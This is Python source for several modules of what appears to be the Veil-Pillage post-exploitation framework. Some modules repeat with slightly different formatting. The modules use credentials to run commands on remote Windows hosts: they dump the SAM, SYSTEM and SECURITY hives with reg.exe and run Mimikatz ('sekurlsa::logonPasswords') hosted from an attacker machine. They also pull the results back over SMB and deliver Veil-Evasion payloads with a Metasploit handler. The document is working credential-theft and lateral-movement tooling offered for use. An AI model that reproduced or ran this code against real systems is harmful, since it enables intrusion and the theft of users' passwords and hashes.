def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = 'powershell.exe -c "$a=42;$a"' powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger( target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True, ) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += ( "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/sam", "w") f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger( target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs ) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += ( "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on " + target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = "powershell.exe -c \"$a=42;$a\"" powershellResult = command_methods.executeResult( target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Autograb to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult( target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] transport = self.required_options["transport"][0] exe_path = self.required_options["exe_path"][0] lhost = self.required_options["lhost"][0] spawnHandler = self.required_options["spawn_handler"][0].lower() # quick sanity check for host/execute logic before we continue... if transport.lower() == "host": # if 'host' is given for a transport method but no lhost is specified if lhost == "none" or lhost == "": print helpers.color("\n [!] lhost needed when hosting a payload", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # if we're using Veil-Evasion for payload generation if exe_path.lower() == "veil": # create a Veil-Evasion controller object for payload generation con = controller.Controller() # check various possibly flags passed by the command line # if we don't have payload specified, jump to the main controller menu if not self.args.p: payloadPath = con.MainMenu() # otherwise, set all the appropriate payload options else: # pull out any required options from the command line and # build the proper dictionary so we can set the payload manually options = {} if self.args.c: options['required_options'] = {} for option in self.args.c: name,value = option.split("=") options['required_options'][name] = [value, ""] # pull out any msfvenom shellcode specification and msfvenom options if self.args.msfpayload: options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions] # manually set the payload in the controller object con.SetPayload(self.args.p, options) # generate the payload code code = con.GeneratePayload() # grab the generated payload .exe name payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False) # nicely print the title and module name again (since Veil-Evasion trashes this) messages.title() print " [*] Executing module: " + helpers.color(self.name) + "..." # sanity check if the user exited Veil-Evasion execution if not payloadPath or payloadPath == "": print helpers.color(" [!] No output from Veil-Evasion", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # if we have a custom-specified .exe, use that instead else: payloadPath = exe_path # if the .exe path doesn't exist, print and error and return if not os.path.exists(payloadPath): print helpers.color("\n\n [!] Invalid .exe path specified", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # build the path to what the handler should be and handlerPath = settings.HANDLER_PATH + payloadPath.split(".")[0].split("/")[-1] + "_handler.rc" # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n [>] Press enter when handler is ready: ") # the hostTrigger method gets the whole target list so the smb hosting # server doesn't have to be setup/torn down for each target if transport.lower() == "host": # if 'host' is given for a transport method but no lhost is specified if lhost == "none": print helpers.color("\n [!] lhost needed when hosting a payload", warning=True) raw_input("\n [>] Press enter to continue: ") return "" else: # execute the host/trigger command with all the targers process = delivery_methods.hostTrigger(self.targets, username, password, payloadPath, lhost, triggerMethod) # build the command to kill that process killCmd = "taskkill /f /im "+process for target in self.targets: self.output += "[*] Payload '\\\\"+lhost+"\\SYSTEM\\"+process+"' triggered using creds '"+username+":"+password+"' on : " + target + "\n" # build our cleanup file to kill the process self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n" # assume upload/trigger else: for target in self.targets: # execute the upload/trigger command with all the targets deliveredName = delivery_methods.uploadTrigger(target, username, password, payloadPath, triggerMethod) self.output += "[*] Payload '"+deliveredName+"' uploaded and triggered using creds '"+username+":"+password+"' on : " + target + "\n" # build the command to kill that process killCmd = "taskkill /f /im "+deliveredName # build our cleanup file to kill the process and delete the binary self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n" # sleep for 3 seconds self.cleanup += "sleep|1\n" # delete the file off self.cleanup += "deletefile|"+target+"|"+username+"|"+password+"|C:\\Windows\\Temp\\"+deliveredName+"\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on "+target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting "+delay+"s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"